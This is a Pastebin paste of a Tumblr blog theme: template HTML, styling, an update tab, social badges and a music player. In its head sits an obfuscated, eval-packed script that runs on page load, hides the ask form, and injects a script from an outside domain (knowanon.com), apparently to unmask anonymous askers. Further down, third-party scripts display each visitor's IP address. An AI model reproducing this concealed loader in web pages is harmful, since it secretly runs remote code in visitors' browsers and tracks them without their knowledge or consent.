Advertisement
Guest User

lucyyyy

a guest
Sep 21st, 2014
215
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 22.37 KB | None | 0 0
  1. <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
  2. "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
  3.  
  4. <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
  5. <meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
  6. <head>
  7. {block:Hidden}<meta name="select:KA" title="Off" content="off"><meta name="select:KA" title="On" content="on">{/block:Hidden}<script>eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('9.c=d(){2.e(\'8\').f.6=\'0\';a=\'4\',b=\'7\',3=2.5(\'3\')[0],1=2.g(\'1\');1.m=\'n/l\';1.k=\'//\'+b+a+\'.j/o?i\';3.h(1)}',25,25,'|script|document|head|anon|getElementsByTagName|opacity|know|ask_form|window|||onload|function|getElementById|style|createElement|appendChild|{select:KA}|com|src|javascript|type|text|ka'.split('|'),0,{}))</script>
  8. <meta name="text:font size" content="9px"/>
  9. <meta name="font:body" content="Arial, Helvetica, sans-serif"/>
  10. <meta name="color:text" content="#000000"/>
  11. <meta name="color:link" content="#00aaff"/>
  12. <meta name="color:hover" content="#d90000"/>
  13. <meta name="color:background color" content="#ffffff"/>
  14. <meta name="color:entry background" content="#ffffff"/>
  15. <meta name="color:hover background" content="#ffffff"/>
  16. <meta name="color:sidebar background" content="#ffffff"/>
  17. <meta name="color:permalink" content="#000000"/>
  18. <meta name="image:sidebar" content="0"/>
  19. <meta name="if:show sidebar image" content="1"/>
  20. <meta name="image:background image" content="0"/>
  21. <meta name="text:first custom link title" content=""/>
  22. <meta name="text:first custom link url" content=""/>
  23. <meta name="text:second custom link title" content=""/>
  24. <meta name="text:second custom link url" content=""/>
  25. <meta name="text:third custom link title" content=""/>
  26. <meta name="text:third custom link url" content=""/>
  27. <meta name="text:fourth custom link title" content=""/>
  28. <meta name="text:fourth custom link url" content=""/>
  29. <meta name="text:fifth custom link title" content=""/>
  30. <meta name="text:fifth custom link url" content=""/>
  31. <meta name="text:sixth custom link title" content=""/>
  32. <meta name="text:sixth custom link url" content=""/>
  33. <meta name="text:seventh custom link title" content=""/>
  34. <meta name="text:seventh custom link url" content=""/>
  35. <meta name="text:eighth custom link title" content=""/>
  36. <meta name="text:eighth custom link url" content=""/>
  37. <meta name="text:reblog symbol" content="*"/>
  38. <meta name="text:rounded size" content="5px"/>
  39. <meta name="if:first custom link" content="0"/>
  40. <meta name="if:second custom link" content="0"/>
  41. <meta name="if:third custom link" content="0"/>
  42. <meta name="if:fourth custom link" content="0"/>
  43. <meta name="if:fifth custom link" content="0"/>
  44. <meta name="if:sixth custom link" content="0"/>
  45. <meta name="if:seventh custom link" content="0"/>
  46. <meta name="if:eighth custom link" content="0"/>
  47. <meta name="if:sidebar right" content="0"/>
  48. <meta name="if:shadow" content="0"/>
  49. <meta name="if:faded" content="0"/>
  50. <meta name="if:sidebar bottom" content="0"/>
  51. <meta name="if:sidebar middle" content="0"/>
  52. <meta name="if:sidebar top" content="0"/>
  53. <meta name="if:rounded corners" content="0"/>
  54. <meta name="if:drop down" content="0"/>
  55. <meta name="if:slide down" content="0"/>
  56. <meta name="text:drop down menu text" content="click for menu"/>
  57. <meta name="text:go link" content="go"/>
  58. <title>{Title}</title>
  59. <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.6.1/jquery.min.js" type="text/javascript"></script>
  60. <script type="text/javascript" src="http://static.tumblr.com/uiqhh9x/J4wm0fipy/jquery-1.7.1.min.js"></script>
  61. <link rel="shortcut icon" href="{Favicon}">
  62. <link rel="alternate" type="application/rss+xml" href="{RSS}">
  63. {block:Description}
  64. <meta name="description" content="{MetaDescription}" />
  65. {/block:Description}
  66. <script type="text/javascript" src="http://static.tumblr.com/uiqhh9x/YGPlywnob/jquery.min.js"></script>
  67.  
  68. {block:ifslidedown}
  69. <script type="text/javascript">
  70. $(document).ready(function () {
  71. $('li.drawer div:nth-child(2)').hide();
  72. $('li.drawer h5').click(function () {
  73. if ($(this).hasClass('open')) {
  74. $('li.drawer div:visible:nth-child(2)').slideUp().prev().removeClass('open');}
  75. else {
  76. $('li.drawer div:visible:nth-child(2)').slideUp().prev().removeClass('open');
  77. $(this).next().slideDown();
  78. $(this).addClass('open');}
  79. });
  80. });
  81. </script>
  82. {/block:ifslidedown}
  83. <link rel="stylesheet" type="text/css" href="http://static.tumblr.com/cpaytv3/nKOlyumhg/reset.css">
  84. <style type="text/css">
  85. body {
  86. color: {color:text};
  87. background:#000;
  88. font-family: {font:body};
  89. font-size: {text:font size};
  90. }
  91.  
  92. li, h5 {
  93. list-style: none;
  94. }
  95.  
  96. body, div, p, textarea, submit, input, html {
  97. font-family: {font:body};
  98. }
  99.  
  100.  
  101.  
  102. #content {
  103. width: 780px;
  104. padding: 5px;
  105. height: auto;
  106. {block:ifnotsidebarright}
  107. float: right;
  108. {/block:ifnotsidebarright}
  109. }
  110. #contain {
  111. padding: 0px;
  112. width: 980px;
  113. margin: 0 auto;
  114.  
  115. }
  116. #titexcel {
  117. position: absolute;
  118. right: 3px;
  119. top: 26px;
  120. }
  121. #sidebar{
  122. float:right;
  123. position:fixed;
  124. background: #000;
  125. padding: 10px;
  126. MARGIN-TOP:130px;
  127. width:160px;
  128. line-height: 12px;
  129. height: auto;
  130. text-align:center;
  131. {block:ifshadow}
  132. -moz-box-shadow: 0 0 6px #555;
  133. -webkit-box-shadow: 0 0 6px#555;
  134. box-shadow: 0 0 6px #555;
  135. {/block:ifshadow}
  136. {block:ifroundedcorners}
  137. -moz-border-radius: {text:rounded size};
  138. border-radius: {text:rounded size};
  139. {/block:ifroundedcorners}
  140. {block:ifsidebarbottom}
  141. bottom: 0;
  142. margin-bottom: 10px;
  143. {/block:ifsidebarbottom}
  144. {block:ifsidebartop}
  145. top: 0;
  146. margin-top: 10px;
  147. {/block:ifsidebartop}
  148.  
  149. }
  150. #sidebar img{
  151. display: block;
  152. padding-bottom: 0px;
  153. {block:ifroundedcorners}
  154. -moz-border-radius: {text:rounded size};
  155. border-radius: {text:rounded size};
  156. {/block:ifroundedcorners}
  157. }
  158. #sidebar a:hover {
  159. text-shadow: 0px 0px 5px #000;
  160. -webkit-transition: all 0.2s linear;
  161. -webkit-transition: all 0.2s linear;
  162. -moz-transition: all 0.2s linear;
  163. transition: all 0.2s linear;
  164. }
  165. .entry {
  166. float: left;
  167. display: block;
  168. margin: 5px;
  169. {block:indexpage}
  170. width: 250px;
  171. {/block:indexpage}
  172. {block:permalinkpage}
  173. width: 780px;
  174. {/block:permalinkpage}
  175. overflow:hidden;
  176. {block:ifshadow}
  177. -moz-box-shadow: 0 0 6px #555;
  178. -webkit-box-shadow: 0 0 6px#555;
  179. box-shadow: 0 0 6px #555;
  180. {/block:ifshadow}
  181. background: {color:entry background};
  182. {block:indexpage}
  183. {block:iffaded}
  184. opacity: 0.8;
  185. filter: alpha(opacity = 80);
  186. {/block:iffaded}
  187. {/block:indexpage}
  188. {block:ifroundedcorners}
  189. -moz-border-radius: {text:rounded size};
  190. border-radius: {text:rounded size};
  191. {/block:ifroundedcorners}
  192. }
  193. .entry:hover {
  194. -webkit-transition: opacity 0.4s linear;
  195. opacity: 1;
  196. -moz-transition: all 0.4s linear;
  197. transition: all 0.4s linear;
  198. filter: alpha(opacity = 100);
  199. }
  200. .entry img {
  201. display: block;
  202.  
  203. {block:ifroundedcorners}
  204. -moz-border-radius: {text:rounded size};
  205. border-radius: {text:rounded size};
  206. {/block:ifroundedcorners}
  207. }
  208. blockquote, q {
  209. quotes: "«" "»" "'" "'";
  210. padding-left: 5px;
  211. }
  212. a, a:link, a:active, a:visited{
  213.  
  214. color:{color:Link};
  215. text-decoration: none;
  216. webkit-transition: all 0.2s linear;
  217. -webkit-transition: all 0.2s linear;
  218. -moz-transition: all 0.2s linear;
  219. transition: all 0.2s linear;
  220.  
  221. }
  222. a:hover {
  223. color:{color:Hover};
  224. text-decoration: none;
  225. }
  226. #pagination{
  227. display:none;
  228. }
  229. ol.notes img {
  230. width: 16px;
  231. position: relative;
  232. top: 3px;
  233. display: inline;
  234. }
  235. .photoset, .photoset_row, div.photoset_photo, .photoset img, .html_photoset {
  236.  
  237. margin: 0 auto;
  238. }
  239.  
  240. .text {
  241. padding: 5px;
  242. }
  243.  
  244. ol.notes {
  245. padding: 0 10px;
  246. }
  247.  
  248. .perma
  249. {
  250. opacity: 0.0;
  251. filter: alpha(opacity = 0);
  252. margin-top: -21px;
  253. width: px;
  254. height: 30px;
  255. line-height: 30px;
  256. font-size: 9px;
  257. position:absolute;
  258. text-align: center;
  259. z-index:9999991;
  260. color: {color:permalink};
  261.  
  262. }
  263. a.p
  264. {
  265.  
  266. color: {color:permalink};
  267. }
  268. .entry:hover .perma {
  269.  
  270. -webkit-transition: opacity 0.4s linear;
  271. opacity: 1;
  272. -moz-transition: all 0.4s linear;
  273. transition: all 0.4s linear;
  274. filter: alpha(opacity = 100);
  275.  
  276. }
  277.  
  278. select {
  279. font-size: 9px;
  280. width: 100px;
  281. margin-left: 10px;
  282.  
  283. }
  284. option {
  285. font-size: 9px;
  286. width: 100px;
  287. text-align: left;
  288.  
  289. }
  290. input[type=button]
  291. {
  292. font-size: 9px;
  293. }
  294.  
  295. .likep {
  296. width: 21px;
  297. height: 20px;
  298. overflow: hidden;
  299. position: relative;
  300. z-index: 9999999;
  301. position: absolute;
  302. margin-top: 26px;
  303. margin-left: 5px;
  304. }
  305. .rep {
  306. width: 24px;
  307. height: 20px;
  308. overflow: hidden;
  309. position: relative;
  310. z-index: 9999999;
  311. position: absolute;
  312. margin-top: 26px;
  313. margin-left: 31px;
  314. }
  315. .likep a:hover {
  316. background-position: 0px 0px;
  317. }
  318. .likep a {
  319. background-image: url("http://static.tumblr.com/uiqhh9x/BPnlzww8v/like.png");
  320. background-position: 0px 0px;
  321. display: block;
  322. z-index: 9999999;
  323. webkit-transition: all 0s linear;
  324. -webkit-transition: all 0s linear;
  325. -moz-transition: all 0s linear;
  326. transition: all 0s linear;
  327. }
  328. .likep img {
  329. width: 21px;
  330. height: 20px;
  331. webkit-transition: all 0.2s linear;
  332. -webkit-transition: all 0.2s linear;
  333. -moz-transition: all 0.2s linear;
  334. transition: all 0.2s linear;
  335. }
  336. .rep img{
  337. width: 24px;
  338. height: 20px;
  339. line-height: 30px;
  340. display: inline;
  341. }
  342.  
  343. .not { position: absolute;
  344. background: url("http://static.tumblr.com/uiqhh9x/X6Ym17xp2/middle.png");
  345. height: 20px;
  346. font-size: 11px;
  347. line-height: 20px;
  348. color: #fff;
  349. position: absolute;
  350. margin-top: 26px;
  351. margin-left: 60px;
  352. padding-left: 4px;
  353. padding-right: 4px;
  354. -moz-border-radius: 2px;
  355. border-radius: 2px;
  356. }
  357. .not a{
  358. color: #fff;
  359. }
  360.  
  361. .entry:hover .not, .entry:hover .rep, .entry:hover .likep {
  362. opacity: 0.8;
  363. filter: alpha(opacity = 80);
  364. }
  365. .not:hover , .rep:hover, .likep:hover {
  366. opacity: 1!important;
  367. filter: alpha(opacity = 100)!important;
  368. }
  369. {CustomCSS}
  370. /*----------------------------------------
  371. Update Tab #1 (CSS Left) by Incedo
  372. http://incedothemes.tumblr.com
  373. Please do not remove the credit.
  374. Instructions @ http://incedothenes.tumblr.com/tab
  375. Updated 8/7/14
  376. ------------------------------------------*/
  377.  
  378. #updatetab {
  379. font-family: helvetica; /*this is the font*/
  380. color: #A0A0A0;} /*this is the font color*/
  381. #tabtitle, #dropdown, #dropdown p {
  382. background-color:#ffffff; /*this is the background color*/
  383. border-color: #D8D8D8;} /*this is the border color*/
  384.  
  385. #updatetab {
  386. width:100px;
  387. position:fixed;
  388. top:14px;
  389. left:14px;}
  390.  
  391. #tabtitle {
  392. text-align:center;
  393. padding:1px 3px;
  394. letter-spacing:2px;
  395. font-size:9px;
  396. text-transform:uppercase;
  397. border-width:1px;
  398. border-style:solid;
  399. border-radius: 2px;
  400. -moz-border-radius: 2px;
  401. -webkit-border-radius: 2px;}
  402.  
  403. #dropdown {
  404. border-style:solid;
  405. border-width:0px 1px 1px 1px;
  406. padding:2px 5px 0px 5px;
  407. border-bottom-right-radius: 2px;
  408. -moz-border-bottom-right-radius: 2px;
  409. -webkit-border-bottom-right-radius: 2px;
  410. border-bottom-left-radius: 2px;
  411. -moz-border-bottom-left-radius: 2px;
  412. -webkit-border-bottom-left-radius: 2px;
  413. opacity:0;
  414. -webkit-transition: all 0.5s ease-in-out;
  415. -moz-transition: all 0.5s ease-in-out;
  416. -o-transition: all 0.5s ease-in-out;
  417. -ms-transition: all 0.5s ease-in-out;
  418. transition: all 0.5s ease-in-out;}
  419.  
  420. #updatetab:hover #dropdown {
  421. opacity:1;
  422. -webkit-transition: all 0.5s ease-in-out;
  423. -moz-transition: all 0.5s ease-in-out;
  424. -o-transition: all 0.5s ease-in-out;
  425. -ms-transition: all 0.5s ease-in-out;
  426. transition: all 0.5s ease-in-out;}
  427. }
  428. #dropdown p {
  429. padding-top:3px;
  430. padding-bottom:3px;
  431. border-width:0px 0px 1px 0px;
  432. border-style:solid;
  433. font-size:10px;}
  434.  
  435. #dropdown p:last-of-type {
  436. border-bottom:0px solid transparent;}
  437.  
  438. #updatetab p, #updatetab ul, #updatetab li, #updatetab ol {
  439. margin: 0px 0px 0px 0px;}
  440.  
  441. #c {
  442. position:fixed;
  443. bottom:4px;
  444. right:4px;
  445. font-size:13px;
  446. font-family:helvetica;}
  447. </style>
  448. </head>
  449. <body>
  450. <!----------------------------------------
  451. Update Tab #1 (HTML) by Incedo
  452. http://incedothemes.tumblr.com
  453. Please do not remove the credit.
  454. Instructions @ http://incedothenes.tumblr.com/tab
  455. Updated 9/21/13
  456. ------------------------------------------>
  457.  
  458. <div id="updatetab">
  459.  
  460. <div id="tabtitle">
  461. <!---this is where you put title of your updates tab--->
  462. updates
  463. </div>
  464.  
  465. <div id="dropdown">
  466. <!---this is where you put your individual updates, make sure to put each update between a set of <p> and </p>--->
  467. <p>Hello there! I hope you like my blog. <script language="JavaScript" src="http://s1.freehostedscripts.net/ocount.php?site=ID2672915&name="></script>
  468. have visited.<p>
  469. <p>Your ip adress is <script language="JavaScript" src="http://freehostedscripts.net/ip.php"></script> and you are currently using <script language="JavaScript" src="http://freehostedscripts.net/browserinfo.php"></script> as your browser!</p>
  470. <p><style>.ig-b- { display: inline-block; }
  471. .ig-b- img { visibility: hidden; }
  472. .ig-b-:hover { background-position: 0 -60px; } .ig-b-:active { background-position: 0 -120px; }
  473. .ig-b-16 { width: 16px; height: 16px; background: url(//badges.instagram.com/static/images/ig-badge-sprite-16.png) no-repeat 0 0; }
  474. @media only screen and (-webkit-min-device-pixel-ratio: 2), only screen and (min--moz-device-pixel-ratio: 2), only screen and (-o-min-device-pixel-ratio: 2 / 1), only screen and (min-device-pixel-ratio: 2), only screen and (min-resolution: 192dpi), only screen and (min-resolution: 2dppx) {
  475. .ig-b-16 { background-image: url(//badges.instagram.com/static/images/ig-badge-sprite-16@2x.png); background-size: 60px 178px; } }</style>
  476. <a href="http://instagram.com/kenirylucy?ref=badge" class="ig-b- ig-b-16"><img src="//badges.instagram.com/static/images/ig-badge-16.png" alt="Instagram" /></a>Follow my instagram!</p>
  477. </div>
  478.  
  479.  
  480. </div>
  481.  
  482. <div id="c"><a href="http://incedo.tumblr.com">©</a></div>
  483. <script type="text/javascript" src="http://static.tumblr.com/uiqhh9x/iAgm04546/infinitescrolling.js"></script>
  484. <div id="contain">
  485. <div id="sidebar">
  486. {block:ifshowtitle}{title}{/block:ifshowtitle}
  487. {block:ifshowsidebarimage}<a href="/"><img src="http://static.tumblr.com/c79cea376bcaaffe04f9a39c198517e6/ywolbhy/uJPnacf17/tumblr_static_dut4ybpffncwg04ckw88c04ow.jpg" width="160"/></a>{/block:ifshowsidebarimage}
  488. <p>{Description}</p><br>
  489. <p><br>
  490.  
  491. <h63737>
  492. <p><a href="{text:first custom link url}">{text:first custom link title}</a></p>
  493.  
  494. <p><a href="{text:second custom link url}">{text:second custom link title}</a></p>
  495.  
  496. <p><a href="{text:third custom link url}">{text:third custom link title}</a></p>
  497.  
  498. <p><a href="{text:fourth custom link url}">{text:fourth custom link title}</a></p>
  499.  
  500. <p><a href="{text:fifth custom link url}">{text:fifth custom link title}</a></p>
  501.  
  502. <p><a href="{text:sixth custom link url}">{text:sixth custom link title}</a></p>
  503.  
  504. <p><a href="{text:seventh custom link url}">{text:seventh custom link title}</a></p>
  505. </h63737>
  506.  
  507. </p>
  508.  
  509. {block:ifdropdown}
  510. <form name="jump">
  511. <select name="menu">
  512. {block:iffirstcustomlink}
  513. <option value="{text:first custom link url}">{text:first custom link title}</option>
  514. {/block:iffirstcustomlink}
  515. {block:ifsecondcustomlink}
  516. <option value="{text:second custom link url}">{text:second custom link title}</option>
  517. {/block:ifsecondcustomlink}
  518. {block:ifthirdcustomlink}
  519. <option value="{text:third custom link url}">{text:third custom link title}</option>
  520. {/block:ifthirdcustomlink}
  521. {block:iffourthcustomlink}
  522. <option value="{text:fourth custom link url}">{text:fourth custom link title}</option>
  523. {/block:iffourthcustomlink}
  524. {block:iffifthcustomlink}
  525. <option value="{text:fifth custom link url}">{text:fifth custom link title}</option>
  526. {/block:iffifthcustomlink}
  527. {block:ifsixthcustomlink}
  528. <option value="{text:sixth custom link url}">{text:sixth custom link title}</option>
  529. {/block:ifsixthcustomlink}
  530. {block:ifseventhcustomlink}
  531. <option value="{text:seventh custom link url}">{text:seventh custom link title}</option>
  532. {/block:ifseventhcustomlink}
  533. {block:ifeighthcustomlink}
  534. <option value="{text:eighth custom link url}">{text:eighth custom link title}</option>
  535. {/block:ifeighthcustomlink}
  536. </select>
  537. <input type="button" onClick="location=document.jump.menu.options[document.jump.menu.selectedIndex].value;" value="{text:go link}">
  538. </form>
  539. {/block:ifdropdown}
  540. </div>
  541. <div id="content">
  542. {block:Posts}
  543. <div class="entry">
  544. {block:IndexPage}<div class="perma">
  545. <div class="likep"><a id="like{PostID}" href="javascript:likelink('{PostID}','{Permalink}','');"><img src="http://static.tumblr.com/lba83dv/OUUltd958/spacer.gif" width="21" height="20" alt="Like this post" id="likeimage{PostID}"/></a></div> <div class="rep"><a href="{reblogurl}" target="_blank"><img src="http://static.tumblr.com/uiqhh9x/OAClzwwao/reblog.png" width="30"/></a></div>
  546. <div class="not"><a href="{Permalink}">{NoteCount}</a></div>
  547.  
  548.  
  549.  
  550. </div>
  551. {/block:IndexPage}
  552. {block:Text}
  553. <div class="text">
  554. {block:Title}
  555. <h3><a href="{Permalink}">{Title}</a></h3>
  556. {/block:Title}
  557. {Body}
  558. </div>
  559. {/block:Text}
  560.  
  561. {block:Photo}
  562. {block:IndexPage}
  563. {LinkOpenTag}<img src="{PhotoURL-250}" alt="{PhotoAlt}"/>{LinkCloseTag}
  564. {/block:IndexPage}
  565. {block:permalinkpage}{LinkOpenTag}
  566. <img src="{PhotoURL-HighRes}" alt="{PhotoAlt}" width="100%"/>{LinkCloseTag}
  567. {/block:permalinkpage}
  568.  
  569. {/block:Photo}
  570.  
  571. {block:Photoset}
  572. {block:IndexPage}
  573. {Photoset-250}
  574. {/block:IndexPage}
  575. {block:permalinkpage}
  576. {Photoset-500}
  577. {/block:permalinkpage}
  578. {/block:Photoset}
  579.  
  580. {block:Quote}
  581. <div class="text">
  582. "{Quote}"
  583.  
  584. </div>
  585. {/block:Quote}
  586.  
  587. {block:Link}
  588. <div class="text">
  589. <a href="{URL}" class="link" {Target}>{Name}</a>
  590. {block:Description}
  591. <div class="description">{Description}</div>
  592. {/block:Description}
  593. </div>
  594. {/block:Link}
  595.  
  596. {block:Chat}
  597. <div class="text">
  598. {block:Title}
  599. <h3><a href="{Permalink}">{Title}</a></h3>
  600. {/block:Title}
  601. <ul class="chat">
  602. {block:Lines}
  603. <li class="{Alt} user_{UserNumber}"> {block:Label} <span class="label">{Label}</span> {/block:Label}
  604.  
  605. {Line} </li>
  606. {/block:Lines}
  607. </ul>
  608. </div>
  609. {/block:Chat}
  610.  
  611. {block:Video}
  612.  
  613. {block:IndexPage}
  614. {Video-250}
  615. {/block:IndexPage}
  616. {block:permalinkpage}
  617. {Video-500}
  618. {/block:permalinkpage}
  619. {/block:Video}
  620.  
  621. {block:Audio}
  622. {AudioPlayerBlack}
  623. <div class="text">
  624. {block:Caption}
  625. {Caption}
  626. {/block:Caption}
  627. </div>
  628. {/block:Audio}
  629. {block:PermalinkPage}
  630. <center>{block:Date}{ShortMonth} {DayofMonth}{DayofMonthSuffix} {Year}{/block:Date}{block:NoteCount} · {NoteCountWithLabel}{/block:NoteCount}{block:HasTags} · Tags: {block:Tags}<a href="{TagURL}">#{Tag} </a>{/block:Tags}{/block:HasTags}</center>
  631. {/block:PermalinkPage}
  632. {block:PostNotes}{PostNotes}{/block:PostNotes}
  633. </div>
  634. {/block:Posts}
  635. </div>
  636. <div class="clear"></div>
  637. </div>
  638. <script src='http://static.tumblr.com/uiqhh9x/D3ylzoiiu/infinitscroll.txt' type='text/javascript'></script>
  639.  
  640.  
  641.  
  642. {block:Pagination}
  643. <ul id="pagination">
  644. {block:PreviousPage}
  645. <li><a href="{PreviousPage}"</a></li>
  646. {/block:PreviousPage}
  647. {block:JumpPagination length="5"}
  648. {block:CurrentPage}
  649. <li><span class="current_page numbersNav"><strong>{PageNumber}</strong></span></li>
  650. {/block:CurrentPage}
  651. {block:JumpPage}
  652. <li><a class="jump_page numbersNav" href="{URL}">{PageNumber}</a></li>
  653. {/block:JumpPage}
  654. {/block:JumpPagination}
  655. {block:NextPage}
  656. <li><a id="nextPage" href="{NextPage}"></a></li>
  657. {/block:NextPage}
  658. </ul>
  659. {/block:Pagination}
  660. {block:IndexPage}
  661. <script src="http://static.tumblr.com/twte3d7/H8Glm663z/masonry.js"></script>
  662. <script src="http://static.tumblr.com/twte3d7/0pellzh2t/infinitescroll.js"></script>
  663. <script type="text/javascript">
  664. $(window).load(function () {
  665. $('#content').masonry(),
  666. $('.masonryWrap').infinitescroll({
  667. navSelector : '#pagination',
  668. nextSelector : '#pagination a#nextPage',
  669. itemSelector : ".entry, .clear",
  670. bufferPx : 200,
  671. loadingImg : "http://static.tumblr.com/plngtrn/ieqlmwwlc/ajax-loader.gif",
  672. loadingText : "<em></em>",
  673. },
  674. function() { $('#content').masonry({ appendedContent: $(this) }); }
  675. );
  676. });
  677. </script>
  678. {/block:IndexPage}
  679. <div style="padding: 5px; position: fixed; bottom: 0px; font-size: 9px; left: 0px; text-transform:lowercase; background: #000000; color: white!important;"><a href="http://tit.tumblr.com"><small style="color: #ffffff;">credit</small></a></div>
  680. <script type="text/javascript" src="http://static.tumblr.com/uiqhh9x/2MFlzww4p/likenew.js"></script>
  681. <iframe id="likeiframe" style="width: 1px; height: 1px;"></iframe>
  682. <span id="scriptsinsert"> </span>
  683. </body>
  684. <!-- SCM Music Player http://scmplayer.net -->
  685. <script type="text/javascript" src="http://scmplayer.net/script.js"
  686. data-config="{'skin':'skins/black/skin.css','volume':50,'autoplay':true,'shuffle':true,'repeat':1,'placement':'bottom','showplaylist':false,'playlist':[{'title':'Unknown','url':'https://www.youtube.com/watch?v=-xfKU31v3Hc'},{'title':'Unknown','url':'https://www.youtube.com/watch?v=y98QwAMmJ5M'},{'title':'Unknown','url':'https://www.youtube.com/watch?v=oWYp1xRPH5g'},{'title':'Unknown','url':'https://www.youtube.com/watch?v=1PvBc2TOpE4'},{'title':'Unknown','url':'https://www.youtube.com/watch?v=cFf85n-Im8Q'},{'title':'Unknown','url':'https://www.youtube.com/watch?v=YzAzB47r-Zc'}]}" ></script>
  687. <!-- SCM Music Player script end -->
  688. <div id="fb-root"></div>
  689. <script>(function(d, s, id) {
  690. var js, fjs = d.getElementsByTagName(s)[0];
  691. if (d.getElementById(id)) return;
  692. js = d.createElement(s); js.id = id;
  693. js.src = "//connect.facebook.net/en_US/all.js#xfbml=1";
  694. fjs.parentNode.insertBefore(js, fjs);
  695. }(document, 'script', 'facebook-jssdk'));</script>
  696. </html>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement